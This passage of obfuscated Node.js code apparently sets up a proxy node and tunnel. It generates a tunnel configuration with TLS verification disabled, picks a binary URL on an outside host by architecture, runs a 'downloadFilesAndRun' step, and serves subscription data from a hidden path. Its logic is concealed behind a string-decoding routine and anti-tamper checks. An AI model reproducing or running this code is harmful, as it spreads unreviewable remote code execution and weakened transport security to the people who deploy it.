_0x1f21fe(_0x599cdb,_0x567536-_0x402d84._0x5f2a5e,_0x382c70-0x1a1,_0x52dd16-0x141);}if(_0x46ef9b[_0x498bb7(0xde,_0x5390a7._0x4ca26a,_0x5390a7._0x4161f6,_0x5390a7._0x29940a)](_0x46ef9b[_0x498bb7(_0x5390a7._0x99c1bc,_0x5390a7._0x3f491f,_0x5390a7._0xaa7fd3,_0x5390a7._0x48c048)],_0x46ef9b[_0x5c32e0(_0x5390a7._0x368c3f,_0x5390a7._0x44acd4,_0x5390a7._0x3b6227,_0x5390a7._0x562ac0)]))console[_0x5c32e0(_0x5390a7._0x54b451,0xbd,_0x5390a7._0x176b05,_0x5390a7._0x50fdb2)](),console['log'](_0x46ef9b[_0x498bb7(_0x5390a7._0x226c1a,-_0x5390a7._0x4f6fc6,-0x15,-0x80)]),console[_0x5c32e0(_0x5390a7._0x28c0bf,_0x5390a7._0x19deed,_0x5390a7._0x41ff37,_0x5390a7._0x3d9690)](_0x5c32e0(_0x5390a7._0x38c55e,_0x5390a7._0x4c9cd0,_0x5390a7._0x3bf124,0x460));else{_0x4c502d[_0x498bb7(_0x5390a7._0x5541fa,_0x5390a7._0x41e68f,_0x5390a7._0x215e13,0x157)](_0x5dcf02[_0x498bb7(0x260,0x1a8,_0x5390a7._0x10528e,_0x5390a7._0xc585b4)](_0x547f0c,_0x498bb7(0xe1,-_0x5390a7._0x164e74,-_0x5390a7._0x1d3a40,_0x5390a7._0x4e60c3)),_0xaf7890);const _0x4323b6=_0x5c32e0(_0x5390a7._0x55114f,_0x5390a7._0x53795f,_0x5390a7._0x120b99,_0x5390a7._0x3ac3ea)+_0x4be2b9['split']('\x22')[-0x6fc+0x298*-0x4+0x1b*0xa5]+_0x498bb7(_0x5390a7._0x252e53,_0x5390a7._0x187ce4,_0x5390a7._0x304d6d,0x339)+_0x581ea9[_0x498bb7(0x260,0x234,_0x5390a7._0x1c3a16,_0x5390a7._0x447c3b)](_0x348bfc,_0x403f24[_0x498bb7(_0x5390a7._0x42708a,_0x5390a7._0xff9b67,_0x5390a7._0x48c7ce,_0x5390a7._0x5f573f)])+_0x498bb7(0x273,_0x5390a7._0x447c3b,0x2f7,_0x5390a7._0x3236d8)+_0x837d36+_0x5c32e0(_0x5390a7._0x52ff90,0x2c9,_0x5390a7._0xd8c021,0x255)+_0x10e86c+'\x0a\x20\x20\x20\x20\x20\x20originRequest:\x0a\x20\x20\x20\x20\x20\x20\x20\x20noTLSVerify:\x20true\x0a\x20\x20\x20\x20-\x20service:\x20http_status:404\x0a\x20\x20';_0x58ccb9[_0x5c32e0(_0x5390a7._0x52c56a,_0x5390a7._0x4b39fe,0x2e8,_0x5390a7._0x45d775)](_0x5181bb[_0x498bb7(_0x5390a7._0x10528e,_0x5390a7._0x3144f0,0x229,0x209)](_0x4ec34a,_0x403f24[_0x498bb7(0x19e,_0x5390a7._0x42d116,_0x5390a7._0x146442,_0x5390a7._0x1c0759)]),_0x4323b6);}});},-0x474d*0x3+-0x7*-0x5eb8+-0x6191);}cleanFiles();async function AddVisitTask(){const _0xd215b8={_0x1f55b8:0x224,_0x2e6ae6:0x217,_0x32b877:0x1c2,_0x1ce5df:0x2dd,_0x2ac2e7:0x1dd,_0x2a396f:0x144,_0x5e1be6:0x12e,_0x2f5ff4:0xec,_0x521aca:0x77,_0xa04df0:0x192,_0x5c43c1:0xd3,_0x5377ac:0xe0,_0x40a4dc:0x294,_0x5e3c0a:0x1b4,_0x4b956e:0x2df,_0x599519:0x1e2,_0x59db23:0x1bd,_0x5c1f2c:0x201,_0x4f91e2:0x315,_0x1ed8c2:0x279,_0x309810:0xf3,_0x4b9d27:0x171,_0x42189c:0x6e,_0x7fcb0d:0xa8,_0x58b534:0x14a,_0xa76627:0x27c,_0x2b3f25:0x233,_0xba632f:0x200,_0x309516:0xe8,_0x118921:0x234,_0x42ab9f:0x1ef,_0x3f5694:0x2d4,_0xf33e49:0x16e,_0x5bb5f3:0x141,_0x3f947f:0x63,_0x4a2fa2:0xe8,_0x13ea7a:0xc,_0x1a5e39:0xa6,_0x4efada:0x21c,_0x3f54dd:0xc4,_0x40a594:0x1d2,_0x24071a:0x326,_0x1d4237:0x179,_0x48e14f:0x201,_0x41eca7:0x31f,_0x51ece9:0x28f,_0x15c561:0x2b7,_0x1499d9:0x303,_0x580243:0x104,_0x507bbd:0x212,_0x21dc2b:0x175,_0x3ceaff:0xbc,_0x446348:0x111,_0x3b9c87:0xf2,_0x391bb3:0xd1,_0x4147d1:0x3ed,_0x23a0d5:0x3aa,_0x4e948a:0x23d,_0x40e323:0x184,_0x31460b:0x1b7,_0x3963cb:0x211,_0xb5fac5:0x256},_0x2d3023={_0x3b0a7f:0x19f,_0x55b8a8:0x4b2},_0x145d68={_0x450a58:0x14b,_0x57133a:0x184};function _0x2d4396(_0xecee57,_0x152574,_0x2a4c9a,_0x53923a){return _0x477c8c(_0xecee57-_0x145d68._0x450a58,_0x152574-0x15d,_0xecee57,_0x2a4c9a- -_0x145d68._0x57133a);}const _0x22e532={};_0x22e532[_0x2fbd31(-_0xd215b8._0x1f55b8,-_0xd215b8._0x2e6ae6,-_0xd215b8._0x32b877,-_0xd215b8._0x1ce5df)]=function(_0x47c40f,_0x3f9e32){return _0x47c40f||_0x3f9e32;},_0x22e532[_0x2d4396(_0xd215b8._0x2ac2e7,_0xd215b8._0x2a396f,_0xd215b8._0x5e1be6,_0xd215b8._0x2f5ff4)]=_0x2fbd31(-_0xd215b8._0x521aca,-_0xd215b8._0xa04df0,-_0xd215b8._0x5c43c1,-0x83),_0x22e532[_0x2fbd31(-_0xd215b8._0x5377ac,-_0xd215b8._0x40a4dc,-_0xd215b8._0x5e3c0a,-0x152)]=_0x2fbd31(-_0xd215b8._0x4b956e,-0x20d,-0x1dd,-_0xd215b8._0x599519),_0x22e532[_0x2fbd31(-_0xd215b8._0x59db23,-0x29c,-_0xd215b8._0x5c1f2c,-_0xd215b8._0x4f91e2)]=_0x2fbd31(-_0xd215b8._0x1ed8c2,-_0xd215b8._0x309810,-_0xd215b8._0x4b9d27,-0x1a3);const _0x19833f=_0x22e532;if(_0x19833f[_0x2d4396(0x14b,0xc9,0x16c,_0xd215b8._0x42189c)](!AUTO_ACCESS,!PROJECT_URL)){if(_0x19833f[_0x2d4396(_0xd215b8._0x7fcb0d,_0xd215b8._0x58b534,_0xd215b8._0x5e1be6,0xcf)]===_0x19833f[_0x2fbd31(-_0xd215b8._0xa76627,-_0xd215b8._0x2b3f25,-_0xd215b8._0xba632f,-_0xd215b8._0x309516)]){console[_0x2fbd31(-_0xd215b8._0x118921,-_0xd215b8._0x42ab9f,-0x23c,-_0xd215b8._0x3f5694)](_0x19833f[_0x2fbd31(-_0xd215b8._0xf33e49,-0x1e2,-_0xd215b8._0x5e3c0a,-_0xd215b8._0x5bb5f3)]);return;}else _0x231fc6['mkdirSync'](_0x3032eb),_0x35f880['log'](_0x84302f+'\x20is\x20created');}function _0x2fbd31(_0x46efbf,_0x3d5f43,_0x5c4a0e,_0x43b908){return _0x477c8c(_0x46efbf-0x1b0,_0x3d5f43-_0x2d3023._0x3b0a7f,_0x3d5f43,_0x5c4a0e- -_0x2d3023._0x55b8a8);}try{const _0x87f622={};_0x87f622[_0x2fbd31(_0xd215b8._0x3f947f,_0xd215b8._0x4a2fa2,-_0xd215b8._0x13ea7a,_0xd215b8._0x1a5e39)]=PROJECT_URL;const _0x59860={};_0x59860[_0x2d4396(_0xd215b8._0x4efada,_0xd215b8._0x3f54dd,0x1b6,_0xd215b8._0x40a594)]=_0x19833f[_0x2fbd31(-_0xd215b8._0x24071a,-_0xd215b8._0x1d4237,-_0xd215b8._0x48e14f,-_0xd215b8._0x41eca7)];const _0x33b9f4={};_0x33b9f4['headers']=_0x59860;const _0x4d9472=await axios[_0x2d4396(_0xd215b8._0x51ece9,0x2f8,_0xd215b8._0x15c561,_0xd215b8._0x1499d9)](_0x2fbd31(-_0xd215b8._0x580243,-_0xd215b8._0x507bbd,-_0xd215b8._0x21dc2b,-0xbc),_0x87f622,_0x33b9f4);return console[_0x2d4396(_0xd215b8._0x3ceaff,_0xd215b8._0x446348,_0xd215b8._0x3b9c87,_0xd215b8._0x391bb3)](_0x2d4396(_0xd215b8._0x4147d1,_0xd215b8._0x23a0d5,0x317,_0xd215b8._0x4e948a)),_0x4d9472;}catch(_0x49969c){return console['error'](_0x2d4396(_0xd215b8._0x40e323,0x2b9,_0xd215b8._0x31460b,0x211)+_0x49969c[_0x2d4396(_0xd215b8._0x3963cb,0x1f7,_0xd215b8._0xb5fac5,0x26f)]),null;}}function _0x4999(_0x360e43,_0x58a607){const _0x112986=_0x38f0();return _0x4999=function(_0x46c2e1,_0x4a9983){_0x46c2e1=_0x46c2e1-(-0x4*-0x89a+-0x2008+-0x1b8);let _0x17dc2c=_0x112986[_0x46c2e1];if(_0x4999['Hthajf']===undefined){var _0x231fc6=function(_0x4916c2){const _0x59ba6d='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x26e1c5='',_0x2d375d='',_0x1d9893=_0x26e1c5+_0x231fc6;for(let _0xf21e2b=-0xff4+0x3a*-0x27+0x18ca,_0x1c13ef,_0x5f078d,_0xea7ba=0x2*0x4bd+-0x1261+0x8e7;_0x5f078d=_0x4916c2['charAt'](_0xea7ba++);~_0x5f078d&&(_0x1c13ef=_0xf21e2b%(-0x1*-0x2038+0x10*-0x4f+-0x1b44)?_0x1c13ef*(0x4*0x26b+-0x1*-0x1b09+-0x2475)+_0x5f078d:_0x5f078d,_0xf21e2b++%(0x65*-0x25+-0xa21+0x2*0xc5f))?_0x26e1c5+=_0x1d9893['charCodeAt'](_0xea7ba+(0xb68+0x1563+-0x20c1))-(-0xf*-0x7a+0x9e3+-0x10ff)!==-0x5*-0x6cd+-0x233*0xd+0xb*-0x7e?String['fromCharCode'](-0x1f*-0x48+-0xce7+0x52e&_0x1c13ef>>(-(-0x9f3+0x2187*-0x1+-0x2*-0x15be)*_0xf21e2b&0x17a3+0x7e5*0x3+-0x2f4c)):_0xf21e2b:0xa*0x371+-0x13*0xa1+0x51*-0x47){_0x5f078d=_0x59ba6d['indexOf'](_0x5f078d);}for(let _0x21923c=0x1cb6+-0xb*-0x29d+-0x3975,_0x51ab5c=_0x26e1c5['length'];_0x21923c<_0x51ab5c;_0x21923c++){_0x2d375d+='%'+('00'+_0x26e1c5['charCodeAt'](_0x21923c)['toString'](0x19*-0x42+-0x134e+-0x19d*-0x10))['slice'](-(0x1f*0x31+-0xded+0x400*0x2));}return decodeURIComponent(_0x2d375d);};_0x4999['UwJswR']=_0x231fc6,_0x360e43=arguments,_0x4999['Hthajf']=!![];}const _0x3032eb=_0x112986[0x37a*0x1+-0x251*-0x7+-0x13b1*0x1],_0x35f880=_0x46c2e1+_0x3032eb,_0x84302f=_0x360e43[_0x35f880];if(!_0x84302f){const _0x2b5e68=function(_0x287369){this['jlKZRx']=_0x287369,this['mZhXkA']=[-0x6*-0x2a0+0x472*0x1+-0x6bb*0x3,-0x3af*-0x1+-0x1*0x1f0f+0x60*0x49,-0x1233+-0x289*0x1+0x14bc],this['VRlgtH']=function(){return'newState';},this['tSWESc']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['VHZcCg']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x2b5e68['prototype']['cYSKSO']=function(){const _0x4d5609=new RegExp(this['tSWESc']+this['VHZcCg']),_0x5a5a0f=_0x4d5609['test'](this['VRlgtH']['toString']())?--this['mZhXkA'][-0x258c+0x7c7*0x1+0x1dc6]:--this['mZhXkA'][0xdcb+0x3*-0x793+0x8ee];return this['tnSqUT'](_0x5a5a0f);},_0x2b5e68['prototype']['tnSqUT']=function(_0x5bd2aa){if(!Boolean(~_0x5bd2aa))return _0x5bd2aa;return this['gpMDXg'](this['jlKZRx']);},_0x2b5e68['prototype']['gpMDXg']=function(_0x376971){for(let _0x42ad15=-0x29b+-0x4*0x298+-0x1*-0xcfb,_0x252862=this['mZhXkA']['length'];_0x42ad15<_0x252862;_0x42ad15++){this['mZhXkA']['push'](Math['round'](Math['random']())),_0x252862=this['mZhXkA']['length'];}return _0x376971(this['mZhXkA'][0x1311+0x13b4+-0x26c5]);},new _0x2b5e68(_0x4999)['cYSKSO'](),_0x17dc2c=_0x4999['UwJswR'](_0x17dc2c),_0x360e43[_0x35f880]=_0x17dc2c;}else _0x17dc2c=_0x84302f;return _0x17dc2c;},_0x4999(_0x360e43,_0x58a607);}async function startserver(){const _0x428cc2={_0x5e7b38:0x166,_0xc049c5:0x218,_0x19af7d:0x298,_0xcdcaf4:0x265,_0x147cea:0x496,_0xa52090:0x396,_0x5f411f:0x36a,_0x547b10:0x19e,_0x129f3d:0x1a8,_0x17917a:0xd3,_0x3460a2:0xc7,_0x46c840:0x13b,_0x4b40ef:0xb5,_0xefd79a:0x128,_0x4cc76b:0x32,_0x44bec7:0x5,_0x4acc61:0xd5,_0x537938:0x2f1,_0x4bba00:0x39e,_0x3ef26f:0x476,_0x26825e:0x438,_0x5d83b6:0x3b8,_0x254a6f:0x27b,_0x3d17b4:0x362,_0x2450a6:0x3ea,_0x3d9d17:0x3a4,_0x4227d3:0x2c5,_0x1981af:0x2b0},_0x526254={_0x4c2538:0x64,_0x38127:0x125,_0x49f8fb:0x7f},_0xe4d3d1={_0x4173ec:0x1ee,_0xb97531:0x22,_0x282216:0x4fc};function _0x1b3f38(_0x44f852,_0x178eb5,_0x1aeedf,_0x25de90){return _0x477c8c(_0x44f852-_0xe4d3d1._0x4173ec,_0x178eb5-_0xe4d3d1._0xb97531,_0x44f852,_0x25de90- -_0xe4d3d1._0x282216);}function _0x43a605(_0x5875c5,_0xfbe951,_0x56c1dc,_0x5a52b8){return _0x477c8c(_0x5875c5-_0x526254._0x4c2538,_0xfbe951-_0x526254._0x38127,_0x5875c5,_0xfbe951- -_0x526254._0x49f8fb);}const _0x8a3340={'XYJfo':function(_0x545640,_0x436166){return _0x545640(_0x436166);},'zcZDt':function(_0x2b2556){return _0x2b2556();},'ntftE':function(_0x20f00){return _0x20f00();},'xZqTU':function(_0x5bea13){return _0x5bea13();},'zglMS':function(_0x4fca12,_0x19f4a7){return _0x4fca12===_0x19f4a7;},'TxIRr':'Error\x20in\x20startserver:'};try{_0x8a3340[_0x1b3f38(-0x11c,-0x275,-_0x428cc2._0x5e7b38,-_0x428cc2._0xc049c5)](argoType),_0x8a3340[_0x43a605(_0x428cc2._0x19af7d,_0x428cc2._0xcdcaf4,0x366,0x159)](deleteNodes),cleanupOldFiles(),await _0x8a3340[_0x43a605(_0x428cc2._0x147cea,0x3aa,_0x428cc2._0xa52090,_0x428cc2._0x5f411f)](generateConfig),await _0x8a3340[_0x1b3f38(-_0x428cc2._0x547b10,-0xaa,-_0x428cc2._0x129f3d,-_0x428cc2._0x17917a)](downloadFilesAndRun),await _0x8a3340[_0x1b3f38(-_0x428cc2._0x3460a2,-_0x428cc2._0x46c840,-_0x428cc2._0x4b40ef,-_0x428cc2._0xefd79a)](extractDomains),await AddVisitTask();}catch(_0x2658c2){_0x8a3340[_0x1b3f38(-0xbc,-_0x428cc2._0x4cc76b,_0x428cc2._0x44bec7,-_0x428cc2._0x4acc61)](_0x43a605(_0x428cc2._0x537938,_0x428cc2._0x4bba00,_0x428cc2._0x3ef26f,_0x428cc2._0x26825e),_0x43a605(_0x428cc2._0x5d83b6,0x376,_0x428cc2._0x254a6f,_0x428cc2._0x3d17b4))?_0x8a3340[_0x43a605(_0x428cc2._0x2450a6,_0x428cc2._0x3d9d17,_0x428cc2._0x4227d3,_0x428cc2._0x1981af)](_0x2b4e34,_0x38a900):console['error'](_0x8a3340['TxIRr'],_0x2658c2);}}startserver()[_0x477c8c(0x3cf,0x3dc,0x343,0x3ec)](_0x3646a3=>{const _0x2d0fa1={_0xdc6b3:0x371,_0x5e836f:0x2c1},_0x219683={_0xfd7436:0x16e,_0x2439a6:0x189,_0x8f1c27:0xba};function _0x23b05f(_0x54d63a,_0x480fe1,_0x118378,_0x3b564d){return _0x477c8c(_0x54d63a-_0x219683._0xfd7436,_0x480fe1-_0x219683._0x2439a6,_0x3b564d,_0x54d63a-_0x219683._0x8f1c27);}console['error'](_0x23b05f(_0x2d0fa1._0xdc6b3,0x403,0x435,_0x2d0fa1._0x5e836f),_0x3646a3);});const server=http['createServer'](async(_0x2bfe4a,_0x22bac6)=>{const _0xb4aad9={_0xdb0c6f:0x4cf,_0x5cc743:0x439,_0x370053:0x3d8,_0x28b785:0x494,_0x58cbfe:0x4f4,_0x2069a1:0x44a,_0x2d006e:0x55f,_0x1e5827:0x431,_0xa0665e:0x48e,_0x2c0547:0x424,_0x493efd:0x3f5,_0x3edcfa:0x241,_0x187044:0x23f,_0x45cbd7:0x2f0,_0xee75ad:0x33a,_0x142759:0x551,_0x5f4632:0x53d,_0x1b7257:0x4b5,_0x3533ee:0x251,_0x4dc3e6:0x56b,_0x255b06:0x545,_0x305ca9:0x512,_0x18ead8:0x64b,_0x13f5e6:0x67f,_0x116807:0x66a,_0x4cc1e5:0x5c6,_0x3e6598:0x5a2,_0xf9c9de:0x652,_0x23c18e:0x51a,_0x2133d9:0x4ea,_0x482f0b:0x3fe,_0x1f9a63:0x3e8,_0x348299:0x495,_0x906c13:0x5f7,_0x170a96:0x584,_0x256254:0x526,_0x5cddee:0x5ac,_0x13a186:0x3e2,_0x15833a:0x3e0,_0x5271b8:0x2d6,_0x246568:0x2bd,_0x4f073b:0x450,_0x4f0b45:0x409,_0x308a53:0x4ac,_0x3e0e02:0x344,_0x514ada:0x40d,_0x42e4a8:0x42c,_0x30a9d1:0x366,_0x442442:0x272,_0x41eead:0x1ea,_0x30a975:0x25c,_0x30becf:0x372,_0x5e9d39:0x4d8,_0x5e618e:0x3a4,_0x3e19c4:0x441,_0x2dcaf5:0x4db,_0x528377:0x46f,_0x3cddf1:0x5d0,_0x586c58:0x3c8,_0x413149:0x53b,_0x515279:0x555,_0x33bc51:0x44d,_0x379d11:0x435,_0x43fa8d:0x3b5,_0x544744:0x3b9,_0x498a81:0x401,_0x483f10:0x42b,_0xd37998:0x4a3,_0x4d5928:0x28b,_0x150423:0x45b,_0x4304ec:0x3c3,_0x5bbb9e:0x50e,_0x45f189:0x18f,_0x2c7be8:0x25a,_0xc6da56:0x2a8,_0x59dc6a:0x443,_0x56a618:0x365,_0x21074e:0x624,_0x1a6b09:0x533,_0xf24230:0x57a,_0x2890c9:0x51c,_0x2e41e0:0x28d,_0x5a9477:0x312,_0x21c0ea:0x31b,_0x323f8b:0x202,_0x28bfe7:0x310,_0x96e0d5:0x303,_0x12c9d3:0x348,_0x22f9bb:0x3d7,_0x50c5a5:0x38d,_0x1159ae:0x3d8,_0x5c699c:0x2b2,_0x1a67ab:0x48a,_0x13bcaf:0x3cc,_0x40cc6e:0x446,_0x1f938b:0x471,_0x13f269:0x2e4,_0x15e813:0x4b5,_0x533616:0x2af,_0x180cc0:0x528,_0x4269d4:0x5d2,_0x563a0c:0x3eb,_0x10719e:0x42c,_0x4362d2:0x474,_0x19fd76:0x412,_0x416f1d:0x419,_0x404796:0x3b1,_0x419d2b:0x380,_0x442d28:0x277,_0x100ae7:0x2e5,_0x395902:0x350,_0x1d79e9:0x360,_0x4825a7:0x2a0,_0x5c8fff:0x32e,_0x412d2e:0x2f5,_0x2af599:0x6cd,_0x33523f:0x667,_0x2cf646:0x11a,_0x2707fa:0x213,_0x4f2b13:0x23c,_0x27ef62:0x340,_0x91d734:0x3d4,_0x286080:0x3a3,_0x299d88:0x1d6,_0x2fb7c5:0x26a,_0x230ea1:0x1a1,_0x3dc838:0x41f,_0x1e9adf:0x2bc,_0x1f2008:0x2bc,_0x86b813:0x289,_0x1f08a9:0x309,_0x99a61c:0x371,_0x13a682:0x423,_0x60e80:0x2f4,_0x50e7db:0x588,_0x102c89:0x59c,_0x408a71:0x4f2,_0x1e943c:0x59e,_0x35c6c3:0x32c,_0x50b575:0x2aa,_0x5e33ac:0x36e,_0x38d173:0x4be,_0x149392:0x3f3,_0x7a5541:0x381,_0x38721a:0x3fe,_0x59b088:0x2df,_0x245a0d:0x517,_0x4ae57a:0x58a,_0x340059:0x49a,_0x1d8397:0x2fe,_0x307282:0x230,_0x53d799:0x23d,_0x5d2b38:0x26c,_0x377e71:0x379,_0x377fb5:0x309,_0x586192:0x245,_0x17ad1f:0x501,_0xfdf278:0x448,_0x47073e:0x31e,_0x42a8d3:0x308,_0x1be305:0x239,_0x1e3709:0x582,_0x3e5d06:0x696,_0x5ef6ee:0x4eb,_0x4d18e4:0x35d,_0x4ebab4:0x201,_0x3fbe7b:0x2b5,_0x3d0fae:0x257,_0x32260d:0x526,_0x22a1c4:0x4f7,_0x1d21af:0x11f,_0x3355f8:0x48f,_0x427ca9:0x3b6,_0xfe202e:0x48c,_0x117c19:0x3d8,_0x5eeccb:0x377,_0x48c30b:0x587,_0x1e1c9b:0x6a1,_0x181b1e:0x67e,_0x53888f:0x5e4,_0x4c2b77:0x5fc,_0x312200:0x646,_0x250764:0x549,_0x1197c3:0x49f,_0x308c0c:0x620,_0x480ad6:0x596,_0x467302:0x4fa,_0x5dcb6e:0x556,_0x4397c7:0x4b8,_0x2dd211:0x69d,_0x9487af:0x4b1,_0x11385c:0x437,_0x23c361:0x58d,_0x1c568e:0x41d,_0x163923:0x411,_0x4257b9:0x45a,_0x4c461f:0x4b1,_0x2d9f27:0x506,_0x3350c3:0x519,_0x1c0445:0x266,_0x62e1dd:0x338,_0x114f8c:0x5cc,_0x1551f4:0x475,_0x1ec24d:0x626,_0x232072:0x374,_0x4f57d7:0x2e9,_0x31182e:0x4a1,_0x1b3b40:0x57e,_0xe6e749:0x4d5,_0x392fa7:0x359,_0x161bd7:0x389,_0x541be0:0x29e,_0x3e796f:0x3d9,_0x280fed:0x422,_0x1dd63d:0x302,_0x32bf99:0x21e,_0x153dda:0x5fb,_0x327718:0x48a,_0xd4ca60:0x53e},_0x161557={_0x219b4a:0x455,_0x87e617:0x13a,_0x3701f6:0x133},_0x8fee39={_0x21b7a2:0x175,_0x22fd0f:0x20},_0x496aac={};_0x496aac[_0x51f3d1(_0xb4aad9._0xdb0c6f,_0xb4aad9._0x5cc743,_0xb4aad9._0x370053,0x4d0)]=function(_0x41b50a,_0x191b53){return _0x41b50a===_0x191b53;},_0x496aac[_0x4a289e(_0xb4aad9._0x28b785,_0xb4aad9._0x58cbfe,_0xb4aad9._0x2069a1,_0xb4aad9._0x2d006e)]=_0x4a289e(_0xb4aad9._0x1e5827,_0xb4aad9._0xa0665e,_0xb4aad9._0x2c0547,_0xb4aad9._0x493efd),_0x496aac['SEAMa']=_0x51f3d1(_0xb4aad9._0x3edcfa,_0xb4aad9._0x187044,_0xb4aad9._0x45cbd7,_0xb4aad9._0xee75ad),_0x496aac['QbVgZ']=_0x4a289e(_0xb4aad9._0x142759,_0xb4aad9._0x5f4632,0x630,_0xb4aad9._0x1b7257),_0x496aac['bBlKr']='text/plain;\x20charset=utf-8',_0x496aac['SWaEF']=function(_0x280ead,_0x15837e){return _0x280ead!==_0x15837e;},_0x496aac[_0x51f3d1(0x353,0x3c6,0x348,_0xb4aad9._0x3533ee)]='mjRUM',_0x496aac[_0x4a289e(_0xb4aad9._0x4dc3e6,_0xb4aad9._0x255b06,_0xb4aad9._0x305ca9,_0xb4aad9._0x18ead8)]=_0x4a289e(0x5ce,_0xb4aad9._0x13f5e6,_0xb4aad9._0x116807,_0xb4aad9._0x4cc1e5),_0x496aac[_0x4a289e(_0xb4aad9._0x3e6598,_0xb4aad9._0xf9c9de,_0xb4aad9._0x23c18e,_0xb4aad9._0x2133d9)]=function(_0x144e95,_0x304c93){return _0x144e95!==_0x304c93;},_0x496aac[_0x4a289e(_0xb4aad9._0x482f0b,_0xb4aad9._0x1f9a63,_0xb4aad9._0x348299,0x4fa)]=_0x4a289e(_0xb4aad9._0x906c13,_0xb4aad9._0x170a96,_0xb4aad9._0x256254,_0xb4aad9._0x5cddee),_0x496aac['aMeBG']='zCgwS',_0x496aac['GNPMM']=_0x51f3d1(_0xb4aad9._0x13a186,_0xb4aad9._0x15833a,_0xb4aad9._0x5271b8,_0xb4aad9._0x246568),_0x496aac[_0x4a289e(0x501,_0xb4aad9._0x4f073b,_0xb4aad9._0x4f0b45,_0xb4aad9._0x308a53)]=_0x51f3d1(_0xb4aad9._0x3e0e02,_0xb4aad9._0x514ada,_0xb4aad9._0x42e4a8,_0xb4aad9._0x30a9d1),_0x496aac[_0x51f3d1(_0xb4aad9._0x442442,_0xb4aad9._0x41eead,_0xb4aad9._0x30a975,_0xb4aad9._0x30becf)]=_0x51f3d1(_0xb4aad9._0x5e9d39,_0xb4aad9._0x5e618e,_0xb4aad9._0x3e19c4,0x4b3),_0x496aac['ZLEXs']=_0x4a289e(_0xb4aad9._0x2dcaf5,_0xb4aad9._0x528377,_0xb4aad9._0x3cddf1,_0xb4aad9._0x586c58),_0x496aac[_0x4a289e(_0xb4aad9._0x413149,_0xb4aad9._0x515279,0x50c,0x592)]=_0x51f3d1(_0xb4aad9._0x33bc51,0x433,_0xb4aad9._0x379d11,_0xb4aad9._0x43fa8d),_0x496aac[_0x51f3d1(_0xb4aad9._0x544744,_0xb4aad9._0x498a81,_0xb4aad9._0x483f10,0x39c)]=_0x51f3d1(_0xb4aad9._0xd37998,_0xb4aad9._0x4d5928,0x39f,_0xb4aad9._0x30becf),_0x496aac['oaNzn']=_0x4a289e(_0xb4aad9._0x150423,0x54c,_0xb4aad9._0x4304ec,_0xb4aad9._0x5bbb9e),_0x496aac['Tgubh']='text/html;\x20charset=utf-8',_0x496aac[_0x51f3d1(0x161,_0xb4aad9._0x45f189,_0xb4aad9._0x2c7be8,_0xb4aad9._0xc6da56)]=_0x4a289e(_0xb4aad9._0x59dc6a,_0xb4aad9._0x482f0b,_0xb4aad9._0x255b06,_0xb4aad9._0x56a618);const _0x4a2d87=_0x496aac,_0x425956=_0x2bfe4a[_0x4a289e(_0xb4aad9._0x21074e,_0xb4aad9._0x1a6b09,_0xb4aad9._0xf24230,_0xb4aad9._0x2890c9)][_0x51f3d1(_0xb4aad9._0x2e41e0,0x2db,_0xb4aad9._0x5a9477,_0xb4aad9._0x21c0ea)]('?')[-0x3*0x878+0xc5b+0xd0d];if(_0x425956==='/'+SUB_PATH){if(_0x4a2d87[_0x51f3d1(_0xb4aad9._0x323f8b,0x294,0x26a,_0xb4aad9._0x28bfe7)](_0x4a2d87[_0x4a289e(0x4f7,0x4fd,0x4be,0x512)],_0x4a2d87[_0x51f3d1(0x301,_0xb4aad9._0x96e0d5,_0xb4aad9._0x12c9d3,_0xb4aad9._0x22f9bb)])){if(_0x405072){const _0x28e4d1=_0x4a2d87[_0x51f3d1(_0xb4aad9._0x50c5a5,0x391,_0xb4aad9._0x1159ae,_0xb4aad9._0x5c699c)](_0x4f512a,_0x4a2d87[_0x4a289e(_0xb4aad9._0x28b785,_0xb4aad9._0x1a67ab,0x3b8,0x4b8)])?_0x4a2d87[_0x51f3d1(_0xb4aad9._0x13bcaf,_0xb4aad9._0x40cc6e,_0xb4aad9._0x1f938b,0x564)]:_0x51f3d1(_0xb4aad9._0x13f269,_0xb4aad9._0x15e813,0x3aa,_0xb4aad9._0x533616),_0x5ad432={};_0x5ad432[_0x4a289e(0x5f3,_0xb4aad9._0x180cc0,_0xb4aad9._0x4269d4,0x4fc)]=_0x3041f7,_0x5ad432[_0x4a289e(_0xb4aad9._0x563a0c,_0xb4aad9._0x10719e,_0xb4aad9._0x5bbb9e,_0xb4aad9._0x4362d2)]=_0x28e4d1,_0xfa40a6[_0x51f3d1(_0xb4aad9._0x19fd76,_0xb4aad9._0x416f1d,0x32a,_0xb4aad9._0x404796)](_0x5ad432);}else{const _0x504e3c=_0x4c3e1a===_0x4a2d87[_0x51f3d1(_0xb4aad9._0x419d2b,_0xb4aad9._0x442d28,_0xb4aad9._0x100ae7,_0xb4aad9._0x395902)]?'https://arm64.ssss.nyc.mn/v1':_0x4a2d87[_0x51f3d1(_0xb4aad9._0x1d79e9,_0xb4aad9._0x4825a7,_0xb4aad9._0x5c8fff,_0xb4aad9._0x412d2e)],_0x49f2f2={};_0x49f2f2[_0x4a289e(0x5f3,_0xb4aad9._0x2af599,0x5da,_0xb4aad9._0x33523f)]=_0x35a845,_0x49f2f2[_0x51f3d1(_0xb4aad9._0x2cf646,_0xb4aad9._0x2707fa,_0xb4aad9._0x4f2b13,_0xb4aad9._0x27ef62)]=_0x504e3c,_0x329d57[_0x51f3d1(_0xb4aad9._0x91d734,_0xb4aad9._0x286080,0x32a,0x42c)](_0x49f2f2);}}else{if(subContent){if(_0x4a2d87[_0x51f3d1(0x30a,_0xb4aad9._0x299d88,_0xb4aad9._0x2fb7c5,_0xb4aad9._0x230ea1)](_0x51f3d1(0x3cf,0x523,_0xb4aad9._0x3dc838,_0xb4aad9._0x96e0d5),_0x4a2d87[_0x51f3d1(_0xb4aad9._0x1e9adf,_0xb4aad9._0x419d2b,0x3bc,0x321)])){const 